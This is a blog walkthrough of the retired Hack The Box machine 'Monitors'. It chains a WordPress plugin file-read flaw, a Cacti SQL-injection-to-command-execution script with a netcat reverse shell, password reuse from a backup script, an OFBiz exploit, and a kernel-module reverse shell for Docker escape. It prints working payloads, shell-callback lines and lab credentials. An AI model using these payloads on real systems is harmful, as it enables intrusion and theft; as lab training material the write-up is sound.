Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Monitors
|htbmachinesretired|

Summary

Monitors was a Hard difficulty Linux box created by TheCyberGeek. Initial foothold on the box was to find a vulnerable wordpress plugin with a LFI, using which we can read file descriptor and read apache logs. From the logs we get a new subdomain (Host) on the box for cactic, Also using the LFI we can read wp-configs.php which contained a credentials. Using Credentials Spraying we find that is the admin Credentials for cactic. Checking the Version for exploits we find that version of cactic is Vulnerable to SQLi which can be converted to RCE. Using which we get a shell on the box as www-data. Enumerating the box we find a service from crontab, following that we find credential for the user of the box. Enumerating the box as user marcus we see a notes.txt in his home directory. Following that hint we find a weird local only service running. port forwarding that service we discover that is an apache ofbiz. Trying a msf module for that give us a root shell in an docker container. Enumerating that we see we have CAP_SYS_MODULE capability and following Hacktrick docker escape we can get a root shell on the box.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Nmap 7.91 scan initiated Sun Apr 25 15:57:04 2021 as: nmap -sC -sV -oN nmap/monitors 10.129.7.173
Nmap scan report for 10.129.7.173
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 15:57:19 2021 -- 1 IP address (1 host up) scanned in 15.69 seconds

Lets start with Web Enumeration

seeing that direct ip access is not allowed and we getting an email admin@monitor.htb we add monitor.htb in our host file and access the page again

Wordpress

Opening monitor.htb we see that it is a Wordpress website

Lets enumerate this more with wpscan and manually.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ wpscan --url "http://monitor.htb"
<SNIP>
 Plugin(s) Identified:

 wp-with-spritz
 | Location: http://monitor.htb/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://monitor.htb/wp-content/plugins/wp-with-spritz/readme.txt

<SNIP>

We see a plugin installed lets search if we have any exploit for that spritz-exploit (LFI/RFI)

Testing if this is vulnerable 

1
2
3
4
5
$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
<SNIP>
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
<SNIP>
1
2
3
$ curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/cmdline -o cmdline;strings cmdline
/usr/sbin/apache2
start

Checking /proc/self/cmdline we see it is an apache process.

Lets try to get site config 

1
2
3
4
5
6
7
8
9
$ curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../..//etc/apache2/sites-available/monitor.htb.conf
<VirtualHost *:80>
        ServerAdmin admin@monitor.htb
        ServerName monitor.htb
        ServerAlias monitor.htb
        DocumentRoot /var/www/wordpress
        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Lets try to get wp-config.php file 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../var/www/wordpress/wp-config.php
<SNIP>
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wpadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
<SNIP>

Lets enumerate /proc/self/fd/ to find anything interesting file descriptors

1
2
3
4
5
6
$ ffuf -fw 1 -w nums -u "http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/FUZZ"
<SNIP>

7                       [Status: 200, Size: 2314, Words: 228, Lines: 12]
10                      [Status: 200, Size: 247276, Words: 17263, Lines: 1919]
<SNIP>
1
2
3
4
5
6
7
$ curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/7
<SNIP>
[Thu Feb 04 14:15:23.408966 2021] [php7:error] [pid 43318] [client 10.10.14.2:45172] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:15:31.538925 2021] [php7:error] [pid 43324] [client 10.10.14.2:45174] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:16:08.699032 2021] [php7:error] [pid 43312] [client 10.10.14.2:45180] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:17:03.865183 2021] [php7:error] [pid 43323] [client 10.10.14.2:45182] script '/usr/share/cacti/user_admin.php' not found or unable to stat
[Thu Feb 04 14:17:35.147503 2021] [php7:error] [pid 41798] [client 10.10.14.2:45184] script '/usr/share/cacti/user_admin.php' not found or unable to stat

This look like apache error.log

Similarly Checking 

1
2
3
4
5
6
7
8
curl http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../../proc/self/fd/10
<SNIP>
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/jstree.js?c1599db7e1aea82d8fe000823bb3aa6b HTTP/1.1" 200 62964
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/c3.js?4475647e3aea91584750d4726c065ccd HTTP/1.1" 200 65378
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/d3.js?6db1c8feb22917c88023d14370218d26 HTTP/1.1" 200 120144
192.168.1.14 - - [11/Nov/2020:12:24:27 +0000] "GET /cacti/include/js/Chart.js?ae4cd3db34d0ea7ea1a9596d5d4120e6 HTTP/1.1" 200 97184
192.168.1.14 - - [11/Nov/2020:12:24:28 +0000] "GET /cacti/images/cacti_logo.svg HTTP/1.1" 200 17295
192.168.1.14 - - [11/Nov/2020:12:24:28 +0000] "GET /cacti/include/themes/modern/images/cacti_logo.gif HTTP/1.1" 200 5891

Lets also get apache configuration for cacti-admin.monitor.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
curl -s http://monitor.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../..//etc/apache2/sites-available/cacti-admin.monitor.htb.conf | grep -v "#"
<VirtualHost *:80>

        ServerAdmin admin@monitor.htb
        ServerName cacti-admin.monitor.htb
        DocumentRoot /usr/share/cacti
        ServerAlias cacti-admin.monitor.htb


        ErrorLog /var/log/cacti-error.log
        CustomLog /var/log/cacti-access.log common

</VirtualHost>

Cacti

Login

Googling for Exploit we see

Checking the github issue and following the instruction

This Part is Unintended way to get the shell (use of nc)

Set Payload

Trigger Payload

Get us shell as www-data

Script

1
2
3
4
5
6
7
8
COOKIE='5bbclmftvkdlqj0q337ps0kpqc'
IP="10.10.14.12"
PORT="9000"
URL="http://cacti-admin.monitor.htb/cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=\'rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+$IP+$PORT+>/tmp/f;\'+where+name=\'path_php_binary\';--"

echo "Setting Payload"
curl -i -s -k -X 'GET' -H 'Host: cacti-admin.monitor.htb' -b "Cacti=$COOKIE; cross-site-cookie=bar" $URL
curl -i -s -k -X 'GET' -H 'Host: cacti-admin.monitor.htb'-b "Cacti=$COOKIE; cross-site-cookie=bar" 'http://cacti-admin.monitor.htb/cacti/host.php?action=reindex'

WWW-Data -> Marcus

Checking linpeas output

we see www-data have a cron

checking the service we find a file in /home/marcus/.backup/backup.sh

1
2
3
4
5
6
7
8
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

using the password on marcus get us user.

Marcus -> Root(Container)

Checking note.txt in marcus home

1
2
3
4
5
marcus@monitor:~$ cat note.txt
TODO:

Disable phpinfo in php.ini              - DONE
Update docker image for production use  -

Checking open ports using netstat -pnutl | grep LISTEN we see an 8443 is listening locally.

So i port forwarded that using 

1
$ sshpass -p 'VerticalEdge2020' ssh -L 8443:127.0.0.1:8443 marcus@monitor.htb

Checking the page in browser we see 404

also checking the cert we see a hint as ofbiz in the certificate name

From this i googled around ofbiz exploit and found one in metasploit

Using which i got a shell in the container

Docker Escape

Checking linux capability on the box we see we have CAP_SYS_MODULE with capsh --print

1
2
3
4
5
6
7
8
9
10
11
$ capsh --print

Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Checking Hacktrick we see we can use CAP_SYS_MODULE to escape docker so I uploaded the 

1
2
3
4
5
6
7
8
obj-m +=reverse-shell.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

and

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");

char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.12/9000 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };

// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}

module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

and running make and insmod reverse-shell.ko

which get us shell as root.

And we have pwned the box

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/monitors/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
retiredlfisqlihtbmachinesspritz cvecactiexecutable directoryofbiz-rcedocker-escapeSYS_MODULE